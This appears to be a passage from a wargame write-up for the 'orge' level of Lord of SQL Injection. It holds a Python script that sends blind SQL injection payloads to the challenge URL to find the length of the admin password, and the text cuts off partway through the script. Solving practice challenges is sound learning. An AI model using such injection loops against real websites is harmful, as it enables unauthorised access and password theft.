Web Hacking/LOS
Lord of SQL Injection(LOS) - orge
import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD' || id='admin' %26%26 length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=False) if "..
